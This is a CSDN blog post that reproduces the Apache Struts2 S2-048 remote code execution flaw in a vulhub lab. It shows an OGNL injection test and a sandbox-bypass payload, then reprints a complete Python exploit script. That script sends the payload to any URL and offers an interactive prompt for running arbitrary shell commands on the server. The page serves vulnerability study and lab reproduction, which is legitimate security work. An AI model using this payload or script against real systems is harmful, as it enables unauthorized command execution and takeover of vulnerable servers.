S2-048(RCE远程代码执行)

最新推荐文章于 2024-06-06 15:33:21 发布
最新推荐文章于 2024-06-06 15:33:21 发布
阅读量1.6k 收藏 1
点赞数 2
分类专栏: 漏洞复现 文章标签: S2-048
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36374896/article/details/84145292
版权

环境搭建:

https://blog.csdn.net/qq_36374896/article/details/84145020

进入漏洞环境

cd vulhub-master/struts2/s2-048/

在这里插入图片描述

启动s2-048环境:

sudo docker-compose up

在这里插入图片描述

访问目标主机地址:
http://192.168.91.130:8080/showcase/

在这里插入图片描述
访问Integration/Struts 1 Integration
在这里插入图片描述
在Gangster Name表单中输入${2*2}
在这里插入图片描述
发现计算结果被输出,OGNL表达式被注入:
在这里插入图片描述
payload:

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}

在这里插入图片描述
exp使用
在这里插入图片描述

EXP

#!/usr/bin/python

# -*- coding: utf-8 -*-

'''

             ____ ____        ___  _  _    ___  
            / ___|___ \      / _ \| || |  ( _ ) 
            \___ \ __) |____| | | | || |_ / _ \ 
             ___) / __/_____| |_| |__   _| (_) |
            |____/_____|     \___/   |_|  \___/ 
                                   
 ____   ____ _____      _   _   _                  _    
|  _ \ / ___| ____|    / \ | |_| |_ _ __ __ _  ___| | __
| |_) | |   |  _|     / _ \| __| __| '__/ _` |/ __| |/ /
|  _ <| |___| |___   / ___ \ |_| |_| | | (_| | (__|   < 
|_| \_\\____|_____| /_/   \_\__|\__|_| \__,_|\___|_|\_\

                    Author By Jas502n

            https://github.com/jas502n/st2-048

            影响不大,周末注意休息,不要搞事情!
            
'''

import json,re
import requests
import threading
import urllib

def Poc(url,command):
    header = {'Content-Type': 'application/x-www-form-urlencoded'}
    poc = {"name":"%{(#szgx='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=' \
                          "+command+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.close())}","age":"1","__checkbox_bustedBefore":"true","description":"123123"}
    data = urllib.urlencode(poc)
    try:
        result = requests.post(url,data=data,headers=header)
        if result.status_code == 200:
            
            print result.content
    except requests.ConnectionError,e:
        print e

th = {"url":""}

while True:
    if th.get("url") != "":
        input_cmd = raw_input("cmd >>: ")
        if input_cmd == "exit":
            exit()
        elif input_cmd == 'set':
            url = raw_input("set url :")
            th['url'] = url
        elif input_cmd == 'show url':
            print th.get("url")
        else:
            Poc(th.get("url"),input_cmd)
    else:
        url = raw_input("set url :")
        th["url"] = url
浅笑⁹⁹⁶
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
s2-048)Struts2 反序列化漏洞
weixin_45253622的博客
12-14 1223
Struts2 Struts2是一个基于MVC设计模式(java)的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts2 是 Apache 软件组织推出的一个相当强大的 Java Web 开源框架,本质上相当于一个 servlet。Struts2 基于 MVC 架构,框架结构清晰。通常作为控制器(Controller)来建立模型与视图的数据交互,用于创建企业级 Java web 应用程序。 漏洞复现
S2-048
weixin_30653097的博客
05-05 74
前言 S2-048漏洞和struts2-struts1-plugin插件有关,该插件用于将Struts1的action也能在struts2上运行,提高兼容性(作用是我猜的~) 正文 我们先看下这个插件对应的配置文件 可以看到我们访问名为saveGangster的action时,处理它的并不是SaveGangsterAction,而是插件中的一个action类org....
CVE-2024-2961:将phpfilter任意文件读取提升为远程代码执行RCE
最新发布
小司机的奥拓
06-06 1039
在nvd网站上是这样描述的:谷歌翻译过来就是:GNU C 库 (也就是glibc)2.39 及更早版本中的 iconv() 函数在将字符串转换为 ISO-2022-CN-EXT 字符集时,可能会使传递给它的输出缓冲区溢出最多 4 个字节,这可能会导致应用程序崩溃或覆盖相邻变量。缓冲区溢出是二进制安全研究领域里很常见的漏洞。所谓缓冲区溢出是指当一段程序尝试把更多的数据放入一个缓冲区,数据超出了缓冲区本身的容量,导致数据溢出到被分配空间之外的内存空间,使得溢出的数据覆盖了其他内存空间的数据。
struts2--(CVE-2017-9791)s2-048
Lucky1youzi的博客
03-13 115
struts2--(CVE-2017-9791)s2-048
漏洞之S2-048 远程代码执行漏洞(CVE-2017-9791)
shy的博客
02-17 1049
S2-048 远程代码执行漏洞(CVE-2017-9791)
S2-048 远程代码执行漏洞检测利用
a1b2c3是弱口令
12-11 1695
2017年7月7日,ApacheStruts 发布最新的安全公告,Apache Struts2的strus1插件存在远程代码执行的高危漏洞,漏洞编号为 CVE-2017-9791(S2-048)。攻击者可以构造恶意的字段值通过Struts2的struts2-struts1-plugin插件,远程执行代码。 漏洞记录 S2-048 CVE-2017-9791 Struts 2.3.X http:...
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
攻击者可以通过提交恶意的、可反序列化的对象,触发远程代码执行RCE)。 接下来是s2-016漏洞(CVE-2016-1000031),这是2016年发现的一个高危漏洞,也与OGNL有关。此漏洞在于Struts2的...
Struts2-RCE:Burp Extender用于检查struts 2 RCE漏洞
04-15
此Burp扩展程序检测以下18个RCE,它们是S2-001 S2-007 S2-008 S2-012 S2-013 S2-014 S2-015 S2-016 S2-019 S2-029 S2-032 S2-033 S2-037 S2-045 S2-048 S2-053 S2-057 S2-DevMode加载扩展Burp Suite- > Extender- >...
struts2 s2-045
03-22
这个漏洞是由于Struts2的核心组件存在的一个逻辑错误,导致了远程代码执行RCE)的可能性,这使得攻击者可以完全控制受影响的服务器。以下是关于这个漏洞的详细解释和相关知识点: **Apache Struts2框架** Apache ...
毕业设计企业网站源码-s2-052-reproducing:s2-052-再现
06-06
REST插件并使用XStream组件对XML进行反序列操作时,未对数据内容进行有效验证,可被攻击者进行远程代码执行攻击(RCE)。 实际场景中存在一定局限性,需要满足一定条件(如要求jdk版本较新),非struts本身默认开启的...
S2-057-poc
08-23
S2-057漏洞,也称为CVE-2018-11776,是Struts2框架中的一个严重安全漏洞,允许远程代码执行RCE),可能导致攻击者能够完全控制受影响的系统。这个漏洞主要出现在Struts2的Struts REST插件中,当用户通过HTTP头发送...
struts2漏洞利用检测工具新添加了struts-048
01-09
增加S2-048 Struts 2.3.X 支持检查官方示例struts2-showcase应用的代码执行漏洞,参考地址:http://127.0.0.1:8080/struts2-showcase/integration/saveGangster.action
S2-048 远程代码执行漏洞
EC_Carrot的博客
08-12 245
漏洞简介 影响版本: 2.0.0 - 2.3.32 详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-048/README.zh-cn.md 漏洞复现 我用的是vulhub的环境,访问http://your_Ip:8080/integration/editGangster.action页面,触发OGNL表达式的位置是Gangster Name这个表单,在vulhub的文章中,作者改了S2-045的沙盒绕过的POC,直接将POC填入表单即
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-048(CVE-2017-9791)
qq_51577576的博客
12-16 1292
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-048(CVE-2017-9791) Apache Struts2 2.3.x 系列启用了struts2-struts1-plugin 插件并且存在 struts2-showcase 目录,其漏洞成因是当ActionMessage接收客户可控的参数数据时,用户可控的值添加到 ActionMessage 并在客户前端展示,导致其进入 getText 函数,最后 message 被当作 ognl 表达式执行,导致任意代码执行
Struts2反序列化漏洞复现
热门推荐
wangyuxiang946的博客
07-20 1万+
作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。环境: vulhub。
s2-048远程代码执行漏洞
Stephen Wolf
11-22 538
一、漏洞描述 触发OGNL表达式的位置是`Gangster Name`这个表单 影响版本 2.0.0 - 2.3.32 二、环境搭建 vulhub靶场搭建 三、漏洞复现 这个环境是直接下载的struts-2.3.32的showcase,部署在tomcat-8.5下。环境启动后,访问`http://your-ip:8080/sho...
S2-048(CVE-2017-9791)EXP
KEY0NE的个人博客
07-08 236
漏洞分析从官方的漏洞描述我们可以知道,这个漏洞本质上是在struts2-struts1-plugin这个jar包上。这个库是用将struts1的action封装成struts2的action以便在strut2上使用。本质原因还是在struts2-struts1-plugin包中Struts1Action.java中execute函数调用了getText函数,这个函...
Struts2 S2-048远程代码执行漏洞复现
春日野穹
10-23 2584
一、漏洞介绍 1.1 漏洞背景 2017年7月7日,ApacheStruts 发布最新的安全公告,Apache Struts2的strus1插件存在远程代码执行的高危漏洞,漏洞编号为 CVE-2017-9791(S2-048)。攻击者可以构造恶意的字段值通过Struts2的struts2-struts1-plugin插件,远程执行代码。 1.2 漏洞影响 Apache Struts 2.3.x系...
远程代码执行漏洞RCE原理
03-28
远程代码执行漏洞(Remote Code Execution,RCE)是指攻击者通过利用程序或系统中的漏洞,成功地在远程主机上执行自己编写或者上传的恶意代码。攻击者可以利用这个漏洞执行系统命令、上传或下载文件、获取敏感信息等,从而对系统进行攻击。 RCE漏洞的原理是攻击者在程序或系统中注入恶意代码,并且成功执行代码,从而实现攻击目的。攻击者通常利用程序或系统中的安全漏洞,比如未经过滤的用户输入、未授权的访问、缓冲区溢出等进行攻击,通过给予恶意代码执行权限,轻松地控制远程主机。 RCE漏洞的危害非常大,攻击者可以通过该漏洞远程控制系统,获取敏感信息,甚至篡改系统中的数据。因此,对于程序开发人员和系统管理员来说,必须要重视漏洞的防范和修复工作,及时更新补丁,加强安全防护,从而有效地防范远程代码执行漏洞的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值